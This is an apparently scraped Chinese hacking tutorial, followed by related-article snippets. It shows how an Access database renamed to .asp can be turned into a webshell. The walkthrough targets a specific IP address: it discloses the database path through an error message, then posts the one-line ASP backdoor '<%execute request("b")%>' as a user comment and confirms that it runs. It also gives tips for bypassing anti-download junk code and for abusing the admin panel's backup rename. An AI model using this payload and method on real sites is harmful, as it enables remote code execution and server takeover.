改mdb为asp所带来的灾难

可能是随着网络安全技术的发展吧,管理员的素质都在提高,在使用access+asp系统时,为不数据库被人下载,到把mdb改为asp或asa。先不说直接改后缀,直接可以用网快等工具直接下载,其实这样你已经是为入侵者打开了大门。入侵者可以利用asp/asa为后缀的数据库直接得到webshell。
1. 思路
大家都知道<%%>为asp文件的标志符,也就是说一个asp文件只会去执行<% %>之间的代码,access+asp的web系统的所有数据都是存放在数据库文件里(mdb文件),由于管理者把mdb文件改为了asp文件,如果我们提交的数据里包含有<%%>,那当我们访问这个asp数据库的时候就会去执行<%%>之间的代码。这样导致我们只提交恶意代码给数据库,那么asp后缀的数据库就是我们的webshell了。

2. 示例
随便找个目标,首先我们暴库,看是不是asp后缀的数据库:
<http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5&log_id=210>
返回:
Microsoft VBScript 编译器错误 错误 '800a03f6' 缺少 'End' /iisHelp/common/500-100.asp,行?4 Microsoft JET Database Engine 错误 '80004005' 'D:\log_mdb\%29dlog_mdb%29.asp'不是一个有效的路径。确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。 /test/conn.asp,行?
我们提交:<http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp>返回一堆的乱码,这样我们可以直接用网际快车等工具直接下载数据库(这里我们不讨论)。我们回到主页看到有提供“网友评论”功能。我们注册个用户,发一条评论:
<%execute request("b")%>

这样我们就把asp代码:<%execute request("b")%>写入了数据库,那么数据库:就是我们的webshell咯。提交:<http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp>在乱码的最后我们看到:
/iisHelp/common/500-100.asp,行?4 Microsoft VBScript 运行时错误 错误 '800a000d' 类型不匹配Åä: 'execut /test/dlog/log_mdb/%29dlog_mdb%29.asp,行?26

哈哈,我们的插入的代码运行了。如下图:

注意:我们在向数据库提交代码时,代码内容不可以太大。所以我们采用<%execute request("b")%>。

3. 其他一些问题和思路
1.对于改了后缀为asp,还对数据库里加入了<%=’a’-1%>等非法的asp代码来彻底防止下载的数据库,由于里面存在了非法的asp代码,插入我们的webshell代码后运行,将只会显示前面非法代码的错误,而不去执行我们shell的代码。虽然这样可以防止一定的攻击,但还是存在一定的隐患,我们只要在出错的代码前加入兼容错误的代码,就可以得到正确显示执行我们插入的webshell代码了。
2.对于没有改后缀的,也就是mdb文件,这样我们可以先直接下载下来得到后台密码,进了后台,可以利用数据库备用改后缀为asp。

也可能是我大惊小怪了。

时间: 2024-08-29 10:47:43

改mdb为asp所带来的灾难的相关文章

access改mdb为asp所带来的灾难 附mdb防下载方法_应用技巧

先不说直接改后缀,直接可以用网快等工具直接下载,其实这样你已经是为入侵者打开了大门.入侵者可以利用asp/asa为后缀的数据库直接得到webshell. 一.思路 大家都知道<%%>为asp文件的标志符,也就是说一个asp文件只会去执行<%%>之间的代码,access+asp的web系统的所有数据都是存放在数据库文件里(mdb文件),由于管理者把mdb文件改为了asp文件,如果我们提交的数据里包含有<%%>,那当我们访问这个asp数据库的时候就会去执行<%%>

access改mdb为asp所带来的灾难 附mdb防下载方法

先不说直接改后缀,直接可以用网快等工具直接下载,其实这样你已经是为入侵者打开了大门.入侵者可以利用asp/asa为后缀的数据库直接得到webshell. 一.思路 大家都知道<%%>为asp文件的标志符,也就是说一个asp文件只会去执行<%%>之间的代码,access+asp的web系统的所有数据都是存放在数据库文件里(mdb文件),由于管理者把mdb文件改为了asp文件,如果我们提交的数据里包含有<%%>,那当我们访问这个asp数据库的时候就会去执行<%%>

改mdb为asp就能防下载技术的探讨

下载 引子:昨天和animator试验了一下,把data.mdb文件改名为data.asp文件后放在wwwroot目录里.然后在IE中输入data.asp路径后,发现IE显示一片空白,右键->察看源文件,跳出记事本,将内容另存为.mdb文件 ,用ACCESS打开,发现需要密码,也就是说至少文件头被破坏.然后用Flashget试验下载data.asp文件,并另存为data.mdb文件,发现用ACCESS打开完好无损!看来,好一些编程人员在开发的时候都认为,改了mdb后缀为asp就能防下载的概念,是

bak文件带来的灾难

第二章 bak文件带来的灾难 /**作者 :慈勤强Email:cqq1978@Gmail.com最后修改:2004-10-03**/ 一日,在网上与一朋友闲聊,朋友是做网站开发的,以前也与其讨论过技术方面的问题, 只是好久没有在网上见到了,就好像人间蒸发了一样. "Steven,最近忙些什么呢?",朋友先问到. "没什么,在家下岗待业呢,呵呵",我答道. "哦,那正好,我们最近刚刚完成了一个政府部门的信息系统,现在正处于试运行阶段, 你看看,给点意见,^-

防止ACCESS数据库被下载的9种方法

access|数据|数据库|下载     篇首语:原来改mdb为asp就能防下载是鬼话.     引子:昨天和animator试验了一下,把 data.mdb文件改名为data.asp文件后放在wwwroot目录里.然后 在IE中输入data.asp路径后,发现IE显示一片空白,右键- >察看源文件,跳出记事本,将内容另存为.mdb文件 ,用ACCESS打开,发现需要密码,也就是说至少文件头被破坏.     然后用 Flashget试验下载data.asp文件,并另存为data.mdb文件,发现

解析动网论坛默认账号密码带来的危害

动网论坛 自从类似动网key.asp文件带来的安全隐患被公开以后,一般比较负责的网站管理员会删掉这些类似的危险文件,但是还有一些我们以前不是太重视的问题,就是默认的账号密码的问题,同前面的危险文件一样,它们也会给网站带来致命的伤害. 不知道为什么,各大程序代码提供者的设的账号密码一般为admin.admin或者admin. admin888,所以往往遇到许多网站,我们只要知道这个网站用的是哪个系统的代码,我们就可以找其默认的管理员账号密码与默认的后台管理页面就可以轻松进入后台.动网的论坛就是一个

用Dreamweaver实现ASP动态网站建设

dreamweaver|动态|网站建设 Macromedia Dreamweaver MX 是一款专业的 HTML 编辑器,用于对 Web 站点.Web 页和 Web 应用程序进行设计.编码和开发.无论您愿意享受手工编写 HTML 代码时的驾驭感还是偏爱在可视化编辑环境中工作,Dreamweaver 都会为您提供有用的工具,使您拥有更加完美的 Web 创作体验. Dreamweaver 使您可以使用服务器技术(例如 CFML.ASP.NET.ASP.JSP 和 PHP)生成由动态数据库支持的 W

讲一讲ASP处理数据用的组件ADO (ActiveX Data Object)

active|activex|ado|object|数据 讲一讲ASP处理数据用的组件ADO (ActiveX Data Object)一. 字符串形式连接一个 Access库 <% set conn=server.createobject("ADODB.CONNECTION") path=server.MapPath("info.mdb") conn.open "provider=microsoft.jet.oledb.4.0; data sour

ASP.Net的6大焦点问题

1 ASP.Net是什么? ASP.Net是建立在微软新一代.Net平台架构上,利用普通语言运行时(Common Language Runtime)在服务器后端为用户提供建立强大的企业级Web应用服务的编程框架. 2.ASP.Net与ASP的联系和主要区别是什么? ASP.Net与现存的ASP保持语法兼容,实际上我们可将现有的ASP源码文件扩展名".asp"改为".aspx",然后配置在支持ASP.Net运行时的IIS服务器的Web目录下,即可获得ASP.Net运行